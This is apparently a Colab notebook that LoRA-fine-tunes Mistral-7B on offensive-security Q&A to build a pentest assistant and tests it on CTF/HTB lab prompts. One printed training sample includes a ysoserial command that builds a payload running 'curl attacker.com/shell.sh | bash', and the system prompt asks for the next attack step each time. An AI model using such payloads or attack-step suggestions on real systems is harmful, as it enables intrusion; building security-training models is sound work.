<a href="https://colab.research.google.com/github/ikramMc/PFE/blob/main/mistral_finetuning.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# **Installing Required Packages**

In [None]:
%%capture
# Install Unsloth and vLLM. Colab is detected by looking for "COLAB_" in the
# names of the environment variables: outside Colab a plain install is used,
# inside Colab the packages are installed without their dependencies and vLLM
# is pinned to 0.8.5.post1.
import os
if "COLAB_" not in "".join(os.environ.keys()):
    !pip install unsloth vllm
else:
    # [NOTE] Do the below ONLY in Colab! Use [[pip install unsloth vllm]]
    !pip install --no-deps unsloth vllm==0.8.5.post1

In [None]:
%%capture
# Weights & Biases client; used further down for experiment tracking.
!pip install wandb

In [None]:
#@title Colab Extra Install { display-mode: "form" }
%%capture
# Full dependency setup. The Unsloth/vLLM install repeats the one in the first
# cell; the Colab branch additionally installs the training stack and the vLLM
# requirements by hand.
import os
if "COLAB_" not in "".join(os.environ.keys()):
    !pip install unsloth vllm
else:
    !pip install --no-deps unsloth vllm==0.8.5.post1
    # [NOTE] Do the below ONLY in Colab! Use [[pip install unsloth vllm]]
    # Skip restarting message in Colab
    import sys, re, requests; modules = list(sys.modules.keys())
    # Drop every already-imported module whose name contains "PIL" or "google"
    # from sys.modules.
    for x in modules: sys.modules.pop(x) if "PIL" in x or "google" in x else None
    !pip install --no-deps bitsandbytes accelerate xformers==0.0.29.post3 peft trl triton cut_cross_entropy unsloth_zoo
    !pip install sentencepiece protobuf "datasets>=3.4.1,<4.0.0" huggingface_hub hf_transfer

    # vLLM requirements - vLLM breaks Colab due to reinstalling numpy
    # Download vLLM's common requirements file, strip the transformers / numpy /
    # xformers entries from it, and install what remains.
    f = requests.get("https://raw.githubusercontent.com/vllm-project/vllm/refs/heads/main/requirements/common.txt").content
    with open("vllm_requirements.txt", "wb") as file:
        file.write(re.sub(rb"(transformers|numpy|xformers)[^\n]{1,}\n", b"", f))
    !pip install -r vllm_requirements.txt

# **Model loading and lora configuration**

In [None]:
from unsloth import FastLanguageModel
import torch

# --- Loading configuration -------------------------------------------------
# Pre-quantized 4-bit Mistral-7B-Instruct v0.3 checkpoint published by Unsloth.
model_name = "unsloth/mistral-7b-instruct-v0.3-bnb-4bit"
# Maximum sequence length; also passed to the trainer further down.
max_seq_length = 4800
# Use 4bit quantization to reduce memory usage. Can be False.
load_in_4bit = True
# None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
dtype = None

# --- Load model + tokenizer ------------------------------------------------
# (Pass `token = "hf_..."` as well when loading gated models such as
# meta-llama/Llama-2-7b-hf.)
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = model_name,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
🦥 Unsloth Zoo will now patch everything to make training faster!
INFO 07-25 08:46:37 [importing.py:53] Triton module has been replaced with a placeholder.
INFO 07-25 08:46:37 [__init__.py:239] Automatically detected platform cuda.
==((====))==  Unsloth 2025.7.8: Fast Mistral patching. Transformers: 4.53.2. vLLM: 0.8.5.post1.
   \\   /|    Tesla T4. Num GPUs = 1. Max memory: 14.741 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.6.0+cu124. CUDA: 7.5. CUDA Toolkit: 12.4. Triton: 3.2.0
\        /    Bfloat16 = FALSE. FA [Xformers = 0.0.29.post3. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


We now add LoRA adapters so we only need to update 1 to 10% of all parameters!

In [None]:
# Wrap the loaded model with LoRA adapters (rank 64, alpha 128, no dropout, no
# bias training) on the attention and MLP projection layers listed below.
model = FastLanguageModel.get_peft_model(
    model,
    r = 64, #Choose any number > 0 ! Suggested 8, 16, 32, 64, 128
    target_modules =["q_proj", "k_proj", "v_proj", "o_proj","gate_proj", "up_proj", "down_proj",], # the seven projection layers that receive adapters (author's note: list revisited on 4/4)
    lora_alpha = 128,
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized; biases are not trained, only weights
    # [NEW] "unsloth" uses 30% less VRAM, fits 2x larger batch sizes!
    use_gradient_checkpointing = "unsloth", # True or "unsloth" for very long context
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

Unsloth 2025.7.8 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.


# **Data Preparation**

We use the `get_chat_template` function to get the correct chat template. Unsloth supports zephyr, chatml, mistral, llama, llama3.1, alpaca, vicuna, vicuna_old, ...



In [None]:
from unsloth.chat_templates import get_chat_template

# Attach the "mistral" chat template to the tokenizer; the formatting function
# below renders conversations with it via `tokenizer.apply_chat_template`.
tokenizer = get_chat_template(
    tokenizer,
    chat_template = "mistral", # Supports zephyr, chatml, mistral, llama, alpaca, vicuna, vicuna_old, unsloth
    # Optional arguments left disabled by the author:
    #mapping = {"role" : "from", "content" : "value", "user" : "human", "assistant" : "gpt"}, # ShareGPT style
    #map_eos_token = True, # Maps <|im_end|> to </s> instead
    #eos_token = "</s>",
)

def formatting_prompts_func(examples):
    """Render a batch of conversations into chat-template strings.

    Args:
        examples: a batch mapping whose "conversations" entry is a list of
            conversations (each one a list of message dicts).

    Returns:
        A dict with a single "text" key holding one rendered string per
        conversation, in the same order.
    """
    rendered = []
    for convo in examples["conversations"]:
        text = tokenizer.apply_chat_template(
            convo, tokenize = False, add_generation_prompt = False
        )
        # Strip a leading '<s>' from the rendered text.
        # NOTE(review): presumably so BOS is not duplicated when the trainer
        # tokenizes the text again - confirm.
        rendered.append(text.removeprefix('<s>'))
    return {"text": rendered}


In [None]:
from datasets import Dataset
from unsloth.chat_templates import standardize_sharegpt
import pandas as pd
import ast

# Training split. Its "conversations" column holds Python-literal strings that
# are parsed with ast.literal_eval below.
df = pd.read_csv("train.csv")

def parse_conversations(conv_str):
    """Parse one CSV cell into a Python object with ``ast.literal_eval``.

    Args:
        conv_str: the raw cell value, expected to be the string form of a
            Python literal (here, a list of message dicts).

    Returns:
        The evaluated literal, or an empty list when the cell cannot be parsed
        (malformed text, empty string, or a non-string value such as NaN).
    """
    try:
        return ast.literal_eval(conv_str)
    # Only swallow the failures literal_eval is documented to raise on bad
    # input; a bare `except:` would also hide KeyboardInterrupt / SystemExit.
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return []

# Convert each parsed conversation into a {"conversations": ...} record and
# build a Hugging Face Dataset from the resulting list of dictionaries.
dataset_list = [
    {"conversations": parse_conversations(conv)} for conv in df["conversations"]
]
hf_dataset = Dataset.from_list(dataset_list)



In [None]:
# Keep only rows with a non-empty conversation; rows that failed to parse were
# turned into an empty list by parse_conversations and are dropped here.
hf_dataset = hf_dataset.filter(lambda example: bool(example["conversations"]))


Filter:   0%|          | 0/10956 [00:00<?, ? examples/s]

In [None]:
# Spot-check one parsed training conversation.
print(hf_dataset[12]["conversations"])

[{'content': 'Explain how to use ysoserial to test for Java deserialization vulnerabilities.', 'role': 'user'}, {'content': "To test with ysoserial:\\n1. First identify potential injection points (parameters with serialized data)\\n2. Generate a test payload that triggers a visible action:\\n```bash\\njava -jar ysoserial.jar URLDNS http://your.dns.logger > payload.b64\\n```\\n3. Encode the payload (if needed) and inject it\\n4. Monitor for DNS callback to confirm vulnerability\\n5. For RCE, replace with appropriate gadget chain:\\n```bash\\njava -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload\\n```\\n6. Use URLDNS first as it's non-destructive", 'role': 'assistant'}]


We now use `standardize_sharegpt` to convert ShareGPT style datasets into HuggingFace's generic format. This changes the dataset from looking like:
```
{"from": "system", "value": "You are an assistant"}
{"from": "human", "value": "What is 2+2?"}
{"from": "gpt", "value": "It's 4."}
```
to
```
{"role": "system", "content": "You are an assistant"}
{"role": "user", "content": "What is 2+2?"}
{"role": "assistant", "content": "It's 4."}
```
In our case, the data is already saved in Hugging Face's generic format.

In [None]:
# Normalize to the Hugging Face message format (role, content)
from unsloth.chat_templates import standardize_sharegpt
train_dataset = standardize_sharegpt(hf_dataset)
train_dataset = train_dataset.map(formatting_prompts_func, batched = True,)# Apply the chat template; adds the "text" column

Unsloth: Standardizing formats (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Map:   0%|          | 0/10956 [00:00<?, ? examples/s]

In [None]:
# Spot-check one rendered training string.
train_dataset[157]["text"]

'[INST] Write a VBS snippet that checks if a file can be created at a specified path before attempting to write. [/INST]```vbs\\nFunction CanCreateFile(strPath)\\n    Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")\\n    On Error Resume Next\\n    oFSO.CreateTextFile(strPath).Close\\n    If Err.Number = 0 Then\\n        CanCreateFile = True\\n        oFSO.GetFile(strPath).Delete\\n    Else\\n        CanCreateFile = False\\n    End If\\n    On Error GoTo 0\\nEnd Function\\n```</s>'

In [None]:
# Validation split. It has the same layout as the training CSV, so the
# `parse_conversations` helper defined with the training data is reused here
# instead of being defined a second time.
df = pd.read_csv("val.csv")

# Convert each parsed conversation into a {"conversations": ...} record.
dataset_list = [
    {"conversations": parse_conversations(conv)} for conv in df["conversations"]
]
hf_dataset_val = Dataset.from_list(dataset_list)

# Drop rows whose conversation is empty (unparseable cells become []), exactly
# as is done for the training split, so evaluation never sees empty samples.
hf_dataset_val = hf_dataset_val.filter(
    lambda example: bool(example["conversations"])
)



In [None]:
# Normalize the validation split to the Hugging Face message format
# (role, content), then render it with the chat template into a "text" column.
from unsloth.chat_templates import standardize_sharegpt
test_dataset = standardize_sharegpt( hf_dataset_val)
test_dataset = test_dataset.map(formatting_prompts_func, batched = True,)

Unsloth: Standardizing formats (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

Map:   0%|          | 0/601 [00:00<?, ? examples/s]

<a name="Train"></a>
# **Train the model**
First, we set up the experiment tracker, Weights & Biases (wandb).


In [None]:
%%capture
# Log in to Weights & Biases with the API key read from Colab's `userdata`
# store, so the key is never written into the notebook.
import wandb
import os
from google.colab import userdata
wandb_api_key=userdata.get('WANDB_API_KEY')
wandb.login(key=wandb_api_key)  # Authenticate with WandB

In [None]:
%%capture
import random
import wandb

# Start a new wandb run to track this script.
run = wandb.init(
    # Set the wandb entity where your project will be logged (generally your team name).
    entity="kimx94347-log",
    # Set the wandb project where this run will be logged.
    project="finetuning_mistral2",
    # No hyperparameter/config dictionary is passed to this call.

)


In [None]:
from trl import SFTTrainer,SFTConfig
from transformers import TrainingArguments, DataCollatorForSeq2Seq
from unsloth import is_bfloat16_supported

# Supervised fine-tuning setup: trains on the rendered "text" column of the
# training split and evaluates on the validation split every 20 steps.
# NOTE(review): `TrainingArguments` is imported but not used in this cell.
trainer = SFTTrainer(
        model=model,
        tokenizer=tokenizer,
        train_dataset=train_dataset,
        eval_dataset=test_dataset,
        dataset_text_field="text",  # Column produced by formatting_prompts_func
        max_seq_length=max_seq_length,
        data_collator=DataCollatorForSeq2Seq(tokenizer=tokenizer),
        dataset_num_proc=2,
        #group_by_length=True,
        packing=False,  # Packing is disabled here (enabling it can make training 5x faster for short sequences)
        args=SFTConfig(
            # 8 samples per device x 8 accumulation steps = 64 samples per optimizer step.
            per_device_train_batch_size=8,
            per_device_eval_batch_size=8,
            gradient_accumulation_steps=8,
            dataloader_drop_last=True,
           # max_grad_norm=2.0,
            warmup_steps=5,
            num_train_epochs=3,
            learning_rate=9e-5,
            eval_strategy="steps",
            eval_steps=20,
            # Use bf16 when the GPU supports it, otherwise fall back to fp16.
            fp16=not is_bfloat16_supported(),
            bf16=is_bfloat16_supported(),
            logging_steps=1,
            optim="adamw_8bit",
            weight_decay=0.01,
            lr_scheduler_type="cosine",
            seed=3407,
            output_dir="outputs_mistral",  # Path to save model checkpoints
            save_strategy="epoch",  # Save model after each epoch
            save_total_limit=7,  # Keep at most 7 checkpoints
            report_to="wandb",  # Log metrics to Weights & Biases
        ),
  )

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

# **Extra step: train on responses only (compute the loss only on the response part)**

In [None]:
from unsloth.chat_templates import train_on_responses_only
# Re-wrap the trainer so that only the assistant responses are supervised.
# "[INST]" and "[/INST]" are the markers that open the instruction part and the
# response part in the rendered Mistral-format text; the next cells decode one
# example to check that the instruction tokens are masked in the labels.
trainer = train_on_responses_only(
    trainer,
    instruction_part = "[INST]",
    response_part = "[/INST]",
)

Map (num_proc=2):   0%|          | 0/10956 [00:00<?, ? examples/s]

Map (num_proc=2):   0%|          | 0/601 [00:00<?, ? examples/s]

Check that the masking works correctly by decoding one training example:

In [None]:
# Full tokenized sample (instruction + response) decoded back to text.
tokenizer.decode(trainer.train_dataset[48]["input_ids"])

'<s>[INST] Why is setting `OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES` necessary for some PID reuse exploits? [/INST]macOS has safety mechanisms that prevent `fork()` from being used in Objective-C programs due to potential instability. Setting this environment variable disables these checks, allowing the exploit to create child processes via `fork()` without crashing. Alternatively, the exploit can include an assembly directive (`.section __DATA,__objc_fork_ok`) to achieve the same effect.</s>'

In [None]:
# Decode the labels of the same sample. Every masked position (label -100) is
# replaced by the token id of a single space so the sequence can be decoded:
# masked tokens show up as blanks and only the supervised text remains.
space = tokenizer(" ", add_special_tokens = False).input_ids[0]
tokenizer.decode([space if x == -100 else x for x in trainer.train_dataset[48]["labels"]])

'                                       macOS has safety mechanisms that prevent `fork()` from being used in Objective-C programs due to potential instability. Setting this environment variable disables these checks, allowing the exploit to create child processes via `fork()` without crashing. Alternatively, the exploit can include an assembly directive (`.section __DATA,__objc_fork_ok`) to achieve the same effect.</s>'

We can see the Instruction prompts are successfully masked!

In [None]:
#@title Show current memory stats
# Snapshot taken before training: total memory of GPU 0 and the peak memory
# reserved so far, both converted from bytes to GB (1024 ** 3 bytes) and
# rounded to 3 decimals. `start_gpu_memory` and `max_memory` are read again by
# the final-stats cell.
gpu_stats = torch.cuda.get_device_properties(0)
max_memory = round(gpu_stats.total_memory / 1024 ** 3, 3)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 ** 3, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

GPU = Tesla T4. Max memory = 14.741 GB.
6.883 GB of memory reserved.


# **Start the trainer**

In [None]:
import os
# Prepend ~/lib to LD_LIBRARY_PATH and LIBRARY_PATH in this process's environment.
# NOTE(review): presumably so a native compile/link step triggered during
# training can find libraries installed under ~/lib - confirm it is still needed.
os.environ["LD_LIBRARY_PATH"] = os.path.expanduser("~/lib") + ":" + os.environ.get("LD_LIBRARY_PATH", "")
os.environ["LIBRARY_PATH"] = os.path.expanduser("~/lib") + ":" + os.environ.get("LIBRARY_PATH", "")

# Run the fine-tuning loop; the returned stats are read by the next cell to
# report the training runtime.
trainer_stats = trainer.train()

==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 10,956 | Num Epochs = 3 | Total steps = 516
O^O/ \_/ \    Batch size per device = 8 | Gradient accumulation steps = 8
\        /    Data Parallel GPUs = 1 | Total batch size (8 x 8 x 1) = 64
 "-____-"     Trainable parameters = 167,772,160 of 7,415,795,712 (2.26% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss,Validation Loss


In [None]:
#@title Show final memory and time stats
# Peak reserved GPU memory after training, compared with the snapshot taken
# before training (`start_gpu_memory`) and with the card's capacity (`max_memory`).
used_memory = round(torch.cuda.max_memory_reserved() / 1024 ** 3, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory / max_memory * 100, 3)
lora_percentage = round(used_memory_for_lora / max_memory * 100, 3)

# Assemble the report line by line, then emit it in one go.
train_runtime = trainer_stats.metrics['train_runtime']
report_lines = [
    f"{train_runtime} seconds used for training.",
    f"{round(train_runtime/60, 2)} minutes used for training.",
    f"Peak reserved memory = {used_memory} GB.",
    f"Peak reserved memory for training = {used_memory_for_lora} GB.",
    f"Peak reserved memory % of max memory = {used_percentage} %.",
    f"Peak reserved memory for training % of max memory = {lora_percentage} %.",
]
print("\n".join(report_lines))

<a name="Inference"></a>
### **Inference**


In [None]:
#INSTRUCT
# Quick qualitative check: stream the fine-tuned model's answer to one
# CTF-style prompt (an nmap service scan).
FastLanguageModel.for_inference(model) # Enable native 2x faster inference

messages = [
 {'content': ' i am playing a ctf what should i do next: nmap -p 21,22,80 -sCV -oA scans/nmap-tcpscripts 10.10.10.249\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 15:13 EDT\nNmap scan report for 10.10.10.249\nHost is up (0.024s latency).\n\nPORT   STATE SERVICE VERSION\n21/tcp open  ftp     vsftpd 3.0.3\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)\n|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)\n|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)\n80/tcp open  http    nginx 1.14.2\n|_http-server-header: nginx/1.14.2\n|_http-title: Pikaboo\nService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 8.15 seconds',
  'role': 'user'},

]
# Render the conversation with the chat template and append the generation
# prompt so the model continues as the assistant.
inputs = tokenizer.apply_chat_template(
    messages,
    tokenize = True,
    add_generation_prompt = True, # Must add for generation
    return_tensors = "pt",
).to("cuda")

from transformers import TextStreamer
# skip_prompt=True: stream only the newly generated tokens, not the prompt.
text_streamer = TextStreamer(tokenizer, skip_prompt = True)
# do_sample=True is needed for `temperature` and `min_p` to have any effect;
# without it generate() decodes greedily and ignores both settings.
_ = model.generate(input_ids = inputs, streamer = text_streamer, max_new_tokens = 256,
                   use_cache = True, do_sample = True, temperature = 0.7, min_p = 0.1)

<a name="Save"></a>
### Saving, loading finetuned models
To save the final model as LoRA adapters, either use Huggingface's `push_to_hub` for an online save or `save_pretrained` for a local save.

**[NOTE]** This ONLY saves the LoRA adapters, and not the full model. To save to 16bit or GGUF, scroll down!

In [None]:
from huggingface_hub import login
from transformers import AutoModelForCausalLM, AutoTokenizer
from google.colab import userdata
# Hugging Face token read from Colab's `userdata` store (not hard-coded).
# NOTE(review): `login` is imported but not called; the token is passed
# directly to push_to_hub below.
hf_token=userdata.get('HF_TOKEN')

# Target Hub repository and the local trainer checkpoint to publish.
# NOTE(review): the training log in this notebook reports 516 total steps with
# save_strategy="epoch", and max_seq_length is 4800 while the repo name says
# "4500tk" - confirm that checkpoint-504 and this name belong to the current run.
model_name="kimxxxx/mistral_r64_a128_b8_gas8_lr9e-5_4500tk_3epoch"
model_location="outputs_mistral/checkpoint-504"
# NOTE(review): these two assignments rebind `model` and `tokenizer`, so the
# inference cell that follows runs on the objects loaded here, not on the
# in-memory trained model.
model = AutoModelForCausalLM.from_pretrained(model_location)
tokenizer = AutoTokenizer.from_pretrained(model_location)

# Upload the model and tokenizer files to the same Hub repository.
model.push_to_hub(model_name, token = hf_token)
tokenizer.push_to_hub(model_name, token = hf_token)

In [None]:
from transformers import TextStreamer
# skip_prompt=True: stream only the newly generated tokens, not the prompt.
text_streamer = TextStreamer(tokenizer, skip_prompt = True)
# Multi-turn test: system instructions, the target address, the assistant's
# previous action, and the resulting scan output as the latest user turn.
messages = [
    {
        "role": "system",
        "content": "you are a professional pentest assistant ,running in a virtual environement ,given the context below you shouldalways suggest the next attack step,give only the next step don't explain too much the given context.you're also provided with a history that show the previous observation and actions .",
    },
    {"role": "user", "content": "the victim machine address :10.10.10.249?"},
    {'content': 'port scanning :\nnmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.249',
  'role': 'assistant'},
 {'content': 'nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.249\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 15:10 EDT\nNmap scan report for 10.10.10.249\nHost is up (0.095s latency).\nNot shown: 65532 closed ports\nPORT   STATE SERVICE\n21/tcp open  ftp\n22/tcp open  ssh\n80/tcp open  http\n\nNmap done: 1 IP address (1 host up) scanned in 171.09 seconds\n',
  'role': 'user'},
 ]
tokenized_chat = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors="pt").to("cuda")
# Print the fully rendered prompt so the applied template can be inspected.
print(tokenizer.decode(tokenized_chat[0]))
# do_sample=True is needed for `temperature` and `min_p` to have any effect;
# without it generate() decodes greedily and ignores both settings.
outputs = model.generate(tokenized_chat, streamer = text_streamer, max_new_tokens = 512,
                 use_cache = True, do_sample = True, temperature = 0.7, min_p = 0.1)

# **TESTS**

In [None]:
from unsloth import FastLanguageModel

# Shared loading options for every fine-tuned comparison model in this cell.
# NOTE(review): these rebind the notebook-level `max_seq_length`, `dtype` and
# `load_in_4bit` set in the model-loading cell at the top.
max_seq_length = 2048 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.


def _load_for_inference(model_name):
    """Load a fine-tuned model with the shared options and enable inference mode.

    Args:
        model_name: Hub id (or path) of the model that was used for training.

    Returns:
        The (model, tokenizer) pair returned by FastLanguageModel.from_pretrained,
        after FastLanguageModel.for_inference has been called on the model.
    """
    loaded_model, loaded_tokenizer = FastLanguageModel.from_pretrained(
        model_name = model_name,
        max_seq_length = max_seq_length,
        dtype = dtype,
        load_in_4bit = load_in_4bit,
    )
    FastLanguageModel.for_inference(loaded_model)
    return loaded_model, loaded_tokenizer


# Toggle which fine-tuned checkpoints get loaded. The comparison cells below
# use whichever of model1 / model2 / model3 are enabled here.
if False:
    model1, tokenizer1 = _load_for_inference("kimxxxx/llama-3-8b_separated_21-3_1400")
if True:
    model2, tokenizer2 = _load_for_inference("kimxxxx/llama-3-8b_separated_22-3_1400_hyperparam_change")
if False:
    model3, tokenizer3 = _load_for_inference("kimxxxx/llama-3.1-8binst_multi_grouped-1epoch")

# Load the base model (same as how you loaded the fine-tuned model, but without loading LoRA weights)
# NOTE(review): for_inference is not called on base_model (that call is part of
# the disabled snippet below) - confirm whether that is intended.
base_model, _ = FastLanguageModel.from_pretrained(
    model_name="unsloth/Meta-Llama-3.1-8B", # or your base model name
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)

# Disabled: optional inference mode for the base model and an extra instruct
# baseline. Kept as comments so the cell does not echo a string as its output.
# FastLanguageModel.for_inference(base_model)  # Enable native 2x faster inference for base model
# instruct_model, _ = FastLanguageModel.from_pretrained(
#     model_name="unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit", # or your base model name
#     max_seq_length=2048,
#     dtype=None,
#     load_in_4bit=True,
# )
#
# FastLanguageModel.for_inference(instruct_model)

In [None]:
import csv
import torch
from transformers import TextStreamer

# Define model parameters
temperature = 0.7
max_tokens = 128

# List of test questions. Adjacent string literals without a comma between
# them are concatenated, so the gobuster listing and the physics question are
# each a single multi-line entry.
questions = [
    "Hello, how are you?",
    "What is the capital of Algeria?",
    "What is a famous tall tower in Paris?",
    "Who were the main scientists behind the discovery of DNA?",
    "The pentest target IP Address this time is: 10.10.18.250",
    "I'm conducting a pentesting and I found this:\n"
    "$ gobuster dir -w $WORDLISTS/dirbuster/directory-list-2.3-medium.txt -q -u http://spider.htb\n"
    "/index                (Status: 200) [Size: 11273]\n"
    "/login                (Status: 200) [Size: 1832]\n"
    "/register             (Status: 200) [Size: 2130]\n"
    "/main                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/user                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/view                 (Status: 302) [Size: 219] [--> http://spider.htb/login]\n"
    "/cart                 (Status: 500) [Size: 290]\n"
    "/logout               (Status: 302) [Size: 209] [--> http://spider.htb/]\n"
    "/checkout             (Status: 500) [Size: 290]\n"
    "What should I do next?",
    "What is the capital of Japan?\n\nA) Beijing\nB) Seoul\nC) Tokyo\nD) Bangkok",
    "A ball is dropped from a height of 20 meters. Ignoring air resistance, approximately how long does it take to reach the ground? (Use g=9.8 m/s²)\n\n"
    "A) 1.5 seconds\nB) 2.0 seconds\nC) 2.5 seconds\nD) 3.0 seconds"
]

# Define the prompt template
alpaca_prompt = """You are a very helpful assistant.
### Input:
{}

### Response:
{}"""

# One streamer is enough for every generate() call below; it echoes the
# generated text to the cell output while the models run.
text_streamer = TextStreamer(tokenizer2)

# Open a CSV file to store results
with open("model_responses.csv", "w", newline="", encoding="utf-8") as csvfile:
    csv_writer = csv.writer(csvfile)
    csv_writer.writerow(["Question", "Fine-Tuned Model Output", "Base Model Output"])  # Column headers

    # Iterate over each question
    for prompt in questions:
        formatted_prompt = alpaca_prompt.format(prompt, "")

        # Tokenize the input once; the same tensors feed both models.
        inputs = tokenizer2(
            [formatted_prompt],
            return_tensors="pt"
        ).to("cuda")

        # Generate response using the fine-tuned model.
        # do_sample=True is needed for `temperature` to have any effect;
        # without it generate() decodes greedily and ignores the setting.
        print("\nFine-tuned Model Output:")
        fine_tuned_response = model2.generate(
            **inputs,
            streamer=text_streamer,
            do_sample=True,
            temperature=temperature,
            max_new_tokens=max_tokens
        )

        # Generate response using the base model (same sampling settings).
        print("\nBase Model Output:")
        base_response = base_model.generate(
            **inputs,
            streamer=text_streamer,
            do_sample=True,
            temperature=temperature,
            max_new_tokens=max_tokens
        )

        # Decode responses.
        # NOTE(review): the whole returned sequence is decoded, so the stored
        # text presumably includes the formatted prompt as well as the answer -
        # confirm that is wanted in the CSV.
        fine_tuned_text = tokenizer2.decode(fine_tuned_response[0], skip_special_tokens=True)
        base_text = tokenizer2.decode(base_response[0], skip_special_tokens=True)

        # Write results to CSV
        csv_writer.writerow([prompt, fine_tuned_text, base_text])

print("\n✅ All responses saved to 'model_responses.csv'.")


In [None]:
# Single-question comparison: send one multiple-choice prompt to the
# fine-tuned model (`model1`) and to `base_model`, streaming both answers.
# NOTE(review): `model1` / `tokenizer1` are only created when the first
# `if False:` toggle in the model-loading cell is switched on; as written this
# cell raises NameError on a fresh Restart & Run All.
# NOTE(review): `temperature` is passed to generate() without do_sample=True -
# confirm whether sampling is intended.
temperature = 0.7 # You can adjust this value as needed
max_tokens=128
# The question to ask; the last line tells the model to answer with a letter only.
prompt='''A ball is dropped from a height of 20 meters. Ignoring air resistance, approximately how long does it take to reach the ground? (Use g=9.8 m/s2g=9.8m/s2)

A) 1.5 seconds
B) 2.0 seconds
C) 2.5 seconds
D) 3.0 seconds
answer only with the letter of the correct answer(A or B or C or D)'''
# Prompt template: first slot is the input, second slot is the response.
alpaca_prompt = """you are a very helpful assistant
### Input:
{}

### Response:
{}"""

inputs = tokenizer1(
[
    alpaca_prompt.format(prompt
      , # input
        "", # output - leave this blank for generation!
    )
], return_tensors = "pt").to("cuda")

from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer1)

# Generate with your fine-tuned model
print("Fine-tuned Model with high leanring rate and 3epochs Output:")
_ = model1.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)

# Disabled (kept as a string literal): the same prompt sent to `model2`.
'''print("Fine-tuned Model withafter lowering the leanring rate and 4epochs Output:")
_ = model2.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)
'''
# Now, let's prompt the base model (assuming you have it loaded as `base_model`)
print("\nBase Model Output:")
_ = base_model.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)

# Disabled (kept as a string literal): the instruct baseline and a
# chat-template run against `model3`.
'''print("\ninstruct Model Output:")
_ = instruct_model.generate(**inputs, streamer=text_streamer, temperature=temperature, max_new_tokens=max_tokens)


messages = [
    {"role": "user", prompt},
]
inputs = tokenizer3.apply_chat_template(
    messages,
    tokenize = True,
    add_generation_prompt = True, # Must add for generation
    return_tensors = "pt",
).to("cuda")

from transformers import TextStreamer
text_streamer = TextStreamer(tokenizer3, skip_prompt = True)
print("\ngrouped data finetuning (10steps):")
_ = model3.generate(input_ids = inputs, streamer = text_streamer, max_new_tokens = max_tokens,
                   use_cache = True, temperature = temperature, min_p = 0.1)
'''
